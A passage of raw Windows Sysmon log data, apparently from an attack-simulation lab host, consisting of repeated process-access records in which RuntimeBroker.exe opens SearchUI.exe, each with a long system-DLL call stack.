hell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dl